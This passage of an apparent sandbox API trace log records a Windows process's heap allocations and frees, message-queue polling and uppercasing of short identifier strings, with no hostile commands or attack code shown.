lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0208.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0208.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12ec0) returned 0x2ac1740 [0208.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.278] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12ec0) returned 0x2aae878 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.279] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0208.279] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0208.279] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0208.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12ec0) returned 0x2aae878 [0208.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72268 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a722a8 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0208.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaae0 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0208.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0208.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0208.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0208.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x12ec0) returned 0x37c0048 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0208.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a724f8 [0208.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72508 [0208.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0208.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0208.283] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72548 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.284] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72548 | out: hHeap=0x2af0000) returned 1 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0208.284] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0208.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72548 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0208.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0208.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0208.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0208.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0208.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0208.285] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0208.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0208.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0208.287] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0208.287] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad80 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaabd0 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad50 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0208.288] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0208.288] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae28 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0208.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaca8 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab70 [0208.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0208.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0208.289] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0208.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaba0 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaadb0 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.289] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad68 [0208.289] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0208.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0208.290] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad68 | out: hHeap=0x2af0000) returned 1 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0208.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0208.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0208.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0208.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0208.290] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0208.290] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0208.290] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaabe8 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaade0 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad20 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0208.291] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0208.291] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0208.291] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0208.291] HeapFree (in: 